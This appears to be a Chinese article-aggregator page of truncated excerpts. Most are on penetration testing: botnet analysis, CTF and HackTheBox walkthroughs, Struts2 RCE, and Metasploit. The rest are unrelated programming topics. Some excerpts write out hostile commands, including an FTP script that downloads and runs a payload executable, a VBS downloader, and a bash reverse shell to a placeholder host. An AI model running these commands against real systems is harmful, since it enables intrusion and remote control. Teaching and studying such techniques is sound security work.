首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
对 Watchbog Botnet 渗透过程和 Payload 的分析
】的更多相关文章
对 Watchbog Botnet 渗透过程和 Payload 的分析
漏洞利用 CVE-2018-1000861 https://jenkins.io/security/advisory/2018-12-05/ Watchbog在做什么? Watchbog僵尸网络为其所有者挖掘Monero加密货币 通过SSH进行横向移动 使用SSH进行横向扩散.使用网络日志可以看到大量的SSH流量 以下Bash脚本用于促进横向移动过程.检索受感染系统上的known_hosts文件的内容,然后尝试SSH到这些系统.还检查SSH密钥是否存在,并利用它们对known_hosts文件中的…
WEB安全番外第六篇--关于通过记录渗透工具的Payload来总结和学习测试用例
背景: 在WEB安全的学习过程中,了解过了原理之后,就是学习各种Payload,这里面蕴藏着丰富的知识含量,是在基本上覆盖了漏洞原理之后的进一步深入学习的必经之路.无理是Burpsuite还是Sqlmap.Awvs亦或是其他工具,包括人工收工构造的Payload都有很高的记录和学习意义,一方面如上所说的提高对WEB安全的掌握和理解,另一方面也对WEB安全自动化测试做积累. 需求: 记录WEB安全各种报文payload的工具 开发语言: Python2.7 依赖第三方库: pypcap dpkt…
Wireshark抓包分析TCP建立/释放链接的过程以及状态变迁分析
Wireshark抓包分析TCP建立/释放链接的过程以及状态变迁分析 一.介绍计算机网络体系结构 1.计算机的网络体系结构 在抓包分析TCP建立链接之前首先了解下计算机的网络通信的模型,我相信学习过计算机网络的都比较熟悉,如下图所示是一个OSI七层模型.TCP/IP四层模型以及五层模型的对比图.(此图来源于计算机网络第七版-谢希仁版本书). 其中OSI模型以及TCP/IP的模型大伙都应该熟悉,至于说五层模型,就是讲网络接口层分成 数据链路层.和物理层,关于这个问题,谢老这么解释的 2.计算机网络…
端口渗透·网站渗透过程 --21 ,22,873,3306,6379,8080(8080端口是针对CMS的渗透)
声明:文章渗透网站为模拟环境,文章只为利用过程 文章为信息收集和端口渗透两部分,21端口为ftp版本漏洞 8080端口为CMS的渗透 信息收集: ·使用扫描工具nmap ,PortScan 对整个网段进行扫描 信息:通过访问网站得到要测试的IP为192.168.31.69 该IP的中间件为Apache/2.4.7 目标系统为Ubuntu 开放的端口为21(ftp:ProFTPD 1.3.3c). 22(ssh).873 (rsync).3306(Mysql). 6379(Redis) .8080…
记录一次坎坷的linux内网渗透过程瞎折腾的坑
版权声明:本文为博主的原创文章,未经博主同意不得转载. 写在前面 每个人都有自己的思路和技巧,以前遇到一些linux的环境.这次找来一个站点来进行内网,写下自己的想法 目标环境 1.linux 2.6.32-358 cpu 架构(x86_64)AND发行版 Red Hat Enterprise Linux Server release 6.4 2.DMZ+防火墙+行为监控,外网开放8080 8084 ... 3.服务器有utibadn用户的权限一枚 Shell具体怎么拿到的就不说了,记录下自…
hack the box -- sizzle 渗透过程总结,之前对涉及到域内证书啥的还不怎么了解
把之前的笔记搬运过来 --- 1 开了443,用smbclient建立空连接查看共享 smbclient -N -L \\\\1.1.1.1 Department Shares Operations share CertEnroll 这三个share是域证书服务的默认共享 2 将共享挂载到本地 mount -t cifs -o rw,username=guest,password= '//10.10.10.103/Department Shares' /mnt cd /mnt 3…
一句话下载总结(用于后渗透上传payload)
利用ftp来下载payload文件 echo open 192.168.1.1 21> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo ftp>> ftp.txt echo GET 1.exe >> ftp.txt ftp -s:ftp.txt 后记:这个我没有实验成功太菜了 利用vbs来下载payload Set Post = CreateObject("Msxml2.XMLHTTP&…
一次绕过防火墙获取RCE以及提权到root权限的渗透过程
本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞.简而言之, 通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞,允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令. 现在,当这个漏洞以病毒式疯狂传播时,主要的应用防火墙厂商开始更新它们的规则引擎和检测技术,以防止它发生. 但是作者不仅能够绕过防火墙并获得远程代码执行,还能够通过利用内核漏…
mysql渗透过程
1 打开目标站点:www.xxx.com 2 注册账号并登录,大概找下注入点,没找到 3 用namp -A -T4 目标站点扫描开放的服务 发现mysql等 4 猜弱口令 + 字典 对mysql进行了破译 (运气较好,得到了密码) 5 连接到mysql 找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符 于是复制了一个超级管理员,用户名及密码复制之前注册的账号 6 打开网站首页,登录,进入管理界面.没找到上传漏洞,也没发现物理路径. 7 在mysql 中尝试读取文件…
Linux内核启动分析过程-《Linux内核分析》week3作业
环境搭建 环境的搭建参考课件,主要就是编译内核源码和生成镜像 start_kernel 从start_kernel开始,才真正进入了Linux内核的启动过程.我们可以把start_kernel看做平时用C编程时的main函数. 在平时应用程序编程中,main函数并不是一开始就启动的,而是先使用汇编和C准备一些变量,例如我们使用的argc和argv参数,以及一些全局变量的初始化.所以我们使用gdb调试程序时,使用bt打印栈痕迹,发现最下面的函数并不是main,而是__libc_start_main…
Ffmpeg解析media容器过程/ ffmpeg 源代码简单分析 : av_read_frame()
ffmpeg 源代码简单分析 : av_read_frame() http://blog.csdn.net/leixiaohua1020/article/details/12678577 ffmpeg中的av_read_frame()的作用是读取码流中的音频若干帧或者视频一帧.例如,解码视频的时候,每解码一个视频帧,需要先调 用 av_read_frame()获得一帧视频的压缩数据,然后才能对该数据进行解码(例如H.264中一帧压缩数据通常对应一个NAL). 对该函数源代码的分析是很久之前做的了…
uboot总结:uboot配置和启动过程2(mkconfig分析)
说明:文件位置:在uboot的目录下,文件名为:mkconfig.本身是一个脚本文件. 它的主要作用的是: (1)创建一个重要的符号链接 (2)创建一个config.mk文件(在include目录下) (3)创建一个config.h文件(在include目录下) 下面会截距一部分重要的代码来分析 1.首先要明白一个参数($1.$2.$3.$4.$5),这是传参 (1)@$(MKCONFIG) $(@:_config=) arm s5pc11x x210 samsung s5pc110 这…
u_boot启动过程中的具体分析(1)
闭上眼睛,细致的回顾一下从NAND FLASH 启动的整个流程,首先,当我们打开板子的时候,先执行的就是嵌入在芯片上的iROM,它的作用就是为了把.NAND Flash 中的bootloader的一部分代码复制到芯片上面的sRAM中,之后,程序在sRAM中执行,它的主要任务就是初始化我们的内存.时钟,以及存储设备,当然更重要的就是从存储设备NAND Flash上拷贝剩下的bootloader到我们的内存的相关位置,之后,执行接下来的bootloader程序,载入执行我们的OS,以及挂在根文件系统…
Python中if __name__=="__main__" 语句在调用多进程Process过程中的作用分析
2018年2月27日 于创B515 引言 最近准备学习一下如何使用Python中的多进程.在翻看相关书籍.网上资料时发现所有代码都含有if __name__=="__main__",在实验的过程中发现如果在运行代码过程中,没有这句话Python解释器就会报错.虽然Python对于multiprocessing的文档第17.2.1.1节中[1]提到必须如此使用,但是我觉得并没有根本上解释清楚.因此我决定从源码来解释我的疑惑. # 代码0.1错误代码import multiprocessi…
Java 程序运行过程中的内存分析
作为 java 程序员,都应该知道 Java 程序运行在 JVM(Java Virtual Machine,Java 虚拟机)上,可以把 JVM 理解成 Java 程序和操作系统之间的桥梁,JVM 实现了 Java 的平台无关性,由此可见 JVM 的重要性.所以在学习 Java 内存分配原理的时候一定要牢记这一切都是在 JVM 中进行的,JVM 是内存分配原理的基础与前提. Java 程序在运行的过程中涉及到以下内存区域: 栈 存放局部变量,可保存基本数据类型的值,还可以保存引用类型变量,即对象…
Python使用Ctypes与C/C++ DLL文件通信过程介绍及实例分析
项目中可能会经常用到第三方库,主要是出于程序效率考虑和节约开发时间避免重复造轮子.无论第三方库开源与否,编程语言是否与当前项目一致,我们最终的目的是在当前编程环境中调用库中的方法并得到结果或者借助库中的模块实现某种功能.这个过程会牵涉到很多东西,本篇文章将简要的介绍一下该过程的一些问题. 1.背景 多语言混合编程可以弥补某一种编程语言在性能表现或者是功能等方面的不足.虽然所有的高级语言都会最终转换成汇编指令或者最底层的机器指令,但是语言本身之间的千差万别很难一言以蔽之,这对不同语言之间相互通信造…
spring mvc 启动过程及源码分析
由于公司开源框架选用的spring+spring mvc + mybatis.使用这些框架,网上都有现成的案例:需要那些配置文件.每种类型的配置文件的节点该如何书写等等.如果只是需要项目能够跑起来,只要按照网上的例子依葫芦画瓢就可,项目也能够运行起来.但是对于有长远目标的人来说,一件事应当知其然更要知其所以然.所以结合网上的其他人阅读spring源码的经验(网上很多人的阅读经验是按照spring分出的那些模块[七大模块:core,context,dao,orm,web,aop,web mvc]来…
服务网关zuul之二:过滤器--请求过滤执行过程(源码分析)
Zuul的核心是一系列的过滤器,这些过滤器可以完成以下功能: 身份认证与安全:识别每个资源的验证要求,并拒绝那些与要求不符的请求. 审查与监控:在边缘位置追踪有意义的数据和统计结果,从而带来精确的生成视图. 动态路由:动态地将请求路由到不同的后端集群. 压力测试:逐渐增加执行集群的流量,以了解性能. 负载分配:为每一种负载类型分配对应容量,并弃用超出限定值得请求. 静态响应处理:在边缘位置直接建立部分响应,从而避免其转发到内部集群. 多区域弹性:跨越AWS Region进行请求路由,旨在实现EL…
vs 连接过程报错 dll 分析 ------- DLL动态链接库
1:编译成功,说明代码没有问题了2:连接报错,说明 exe 在查找dll 的入口地址过程,找不到合适的信息,这些信息保存在 dll 对应的 *.lib 文件里面 说明:exe如果生成成功了lib 这个中间产物就不需要了!!!,这是关键点!!!3:.lib文件和.h 是在 visual studio 里面需要开发者自己设置的,这是让exe 正确找到DLL动态链接库调用函数的地址信息!!!,使用者不需要考虑,但是开发者必须清楚这个过程 找到原理后,以后再遇到这样的问题,心里就不要慌了,就知道怎么去…
Android应用程序启动过程(二)分析
本文依据Android6.0源码,从点击Launcher图标,直至解析到MainActivity#OnCreate()被调用. Launcher简析 Launcher也是个应用程序,不过是个特殊的应用.俗称“桌面”.通过PackageManagerService查询所有已安装的应用程序,并保存相应的图标.应用名称.包名和第一个要启动的类名等. 源码位置:frameworks/base/core/java/android/app/LauncherActivity.java LauncherActi…
C C++ Java C# JS编译、执行过程的原理入门分析
C.C++是典型的编译型编程语言,编译链接后,点击则可执行. JS,解释型脚本语言,则不需要进行编译,直接解释执行. Java和C#则是所谓的高级语言,编译执行的方式做了很多处理, 尤其是C#,VS编译后生成的exe文件并非机器码,让很多程序员误解. 下文笔者将自己的理解和查阅的资料,和大家分享.有疏漏之处,请大家指出,共同学习. 1.C.C++ C.C++是典型的编译型编程语言,编译链接后,点击则可执行. C.C++ 编译执行的原理,也比较简单,直接是源码经过编译链接之后,生成机器码组…
Spring Boot JDBC:加载DataSource过程的源码分析及yml中DataSource的配置
装载至:https://www.cnblogs.com/storml/p/8611388.html Spring Boot实现了自动加载DataSource及相关配置.当然,使用时加上@EnableAutoConfiguration注解是必须的.下面就是对这一部分的源码分析. (1)Spring Boot启动后会调用org.springframework.boot.autoconfigure.jdbc.DataSourceAutoConfiguration.下面是部分源码. 1 @Configu…
Netty服务端启动过程相关源码分析
1.Netty 是怎么创建服务端Channel的呢? 我们在使用ServerBootstrap.bind(端口)方法时,最终调用其父类AbstractBootstrap中的doBind方法,相关源码如下: private ChannelFuture doBind(final SocketAddress localAddress) { //初始化和注册 final ChannelFuture regFuture = initAndRegister(); ..... 我们继续跟进initAndReg…
Linux启动过程的内核代码分析
参考上文: http://www.cnblogs.com/long123king/p/3543872.html http://www.cnblogs.com/long123king/p/3545688.html 补充:linker script documentation http://www.nacad.ufrj.br/online/sgi/860-0247-001/sgi_html/ldLinker_scripts.html 参考:http://blog.chinaunix.net/uid-…
【渗透测试】ZipperDown 漏洞分析
0x01 漏洞危害 1. 在使用 HTTP 下载 zip 包并使用有问题的第三方库 unzip 时,攻击者通过劫持 HTTP 流量,可以导致 APP 下载一个恶意的 zip 包,在解压 zip 包时可以任意覆盖 APP 文件夹内的内容,从而影响用户正常使用. 2. 对使用了JSPatch 或其他热更新技术的 APP,可能可以导致控制代码执行. 0x02 漏洞详情 第三方 unzip 库,在解压 zip 包时未检查解压路径,当使用这些第三方的库解压时未过滤包含”../../../”的文件路径以及符…
【ARTS】01_41_左耳听风-201900819~201900825
ARTS: Algrothm: leetcode算法题目 Review: 阅读并且点评一篇英文技术文章 Tip/Techni: 学习一个技术技巧 Share: 分享一篇有观点和思考的技术文章 Algorithm [leetcode]107. 二叉树的层次遍历 II https://leetcode-cn.com/problems/binary-tree-level-order-traversal-ii/ 1)problem 给定一个二叉树,返回其节点值自底向上的层次遍历. (即按从叶子节点所在层…
Burpsuite常用模块详解以及渗透测试上的运用
0x00前言 哪有什么前言,大家好,我是浅安.QQ:320229344... 0x01 JDK的安装,以及Burpsuite的成功开启. burpsuite基于JAVA环境才能正常运行的.所以要先安装个JDK. 最新JDK地址:JDK下载 下载好的JDK,进行安装,安装之后在我的电脑-->属性-->高级系统设置-->高级-->环境变量-->找到path 将path里面的变量值添加安装路径, 我安装好的路径是:C:\Program F…
Metasploit渗透技巧:后渗透Meterpreter代理
Metasploit是一个免费的.可下载的渗透测试框架,通过它可以很容易地获取.开发并对计算机软件漏洞实施攻击测试.它本身附带数百个已知软件漏洞的专业级漏洞攻击测试工具. 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了.仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来测试那些未打过补丁或者刚刚打过补丁的漏洞. 正是因为Metasploit团队一直都在努力开发各种攻击测试工具,并将它们贡献给所有Metasploit用户,软件厂商再也不能…
从一次渗透谈到linux如何反弹shell
零.绪论 背景: ThinkPHP框架的--> 找到一个OS命令注入(很简单的Burp可以直接扫出来的那种):页面配置系统默认网关处. 一.渗透过程 1.首先看了一下,没有回显. 2.用ceye.io看DNSlog发现不能连接外网. 3.内网ping ok!说明可以的,确实命令执行. 4.弹bash 最常见的监听端nc nc -p -l -v 二.下面开始弹bash: 1.最常见的bash的 bash -i >& /dev/tcp/a.b.c.d/ >& #没成功,尝试b…
25. CTF综合靶机渗透(17)
靶机链接 https://www.vulnhub.com/entry/the-ether-evilscience,212 运行环境 本靶机提供了VMware的镜像,从Vulnhub下载之后解压,运行vmx文件即可 靶机:本靶机默认使用了自动获取的上网模式.运行靶机之后,将会桥接到物理网卡,接入网络. 攻击机:Kali虚拟机运行于virtualbox,同样使用桥接模式,即可访问靶机. 靶机说明 本靶机有一定难度,不适合初学者. 本靶机的渗透目标为渗透进靶机并且找到系统中隐藏的Flag值. 官方提供…